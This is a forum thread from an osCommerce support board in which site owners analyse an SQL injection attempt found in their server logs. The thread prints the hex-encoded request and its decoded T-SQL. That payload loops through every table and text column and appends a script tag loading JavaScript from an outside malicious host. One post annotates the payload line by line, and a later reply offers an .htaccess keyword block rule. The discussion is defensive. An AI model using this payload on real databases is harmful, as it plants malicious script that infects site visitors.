Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Strange URL in Logs


Maxwell Smart

Recommended Posts

I found a rather strange URL in my logs today:

 

/shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228

3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656

C65637420612E6E616D652C622E6E616D652066726F6D2073797

 

This was actually their landing page.

Link to comment
Share on other sites

Ok, so I've managed to figure out that's an SQL injection attack which translates to this:

 

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo. 1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

 

Now obviously I'm going to want to check my db for changes but what would I be looking for?

Link to comment
Share on other sites

Apparently I should search Google before posting here...

 

The following was taken from http://forum.joomla.org/viewtopic.php?f=43...375661#p1375966

 

this looks like MS SQL Server T-SQL and the tables it references don't exist in MySQL (which I assume is your back end database).

DECLARE @T varchar(255),@C varchar(4000) --sets two variables to put your data in

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) --sets up a cursor to read through all tables and all column names, i.e it retrieves tablename/columnname pairs for all the tables in your data

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C--opens cursor and starts reading the rows one at a time

WHILE(@@FETCH_STATUS=0) BEGIN --loop handling
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo. 1000mg.cn/csrss/w.js"></script><!--''') --updates every column in every table to append a string to the existing data in the column. set ['+@C+']=['+@C+']+''"> pseudocode for this bit is "SET column_contents = column_contents plus something extra. The something extra looks like: "></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--"
(so everything after it will be commented out). He also avoids columns that he's already done.

FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@) --get the next row and do it all again until loop is complete

Link to comment
Share on other sites

  • 3 weeks later...
I found a rather strange URL in my logs today:

 

/shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228

3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F52207365

6

C65637420612E6E616D652C622E6E616D652066726F6D2073797

 

This was actually their landing page.

 

My site was also hacked. Images were not being displayed when I entered the "product_info.php".

It turned-out someone had updated the "store name" parameter in the admin to include text

similar to the one you have got there. Unfortunately I forgot to copy it before I reset the parameter.

Let me know if you find any solution(s) to block this kind of intrusion.

Link to comment
Share on other sites

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

i got hammered by this 10 times over recently.

 

 

adding this to .htaccess:

RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|meta|script|select|truncate)[^a-z] [NC]
RewriteRule (.*) - [F,L]

should make it stop appearing in your logs... it'll give them a 500 error instead of a 404 or 200 response

(once you serve these twits a proper error they tend to buzz off)

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...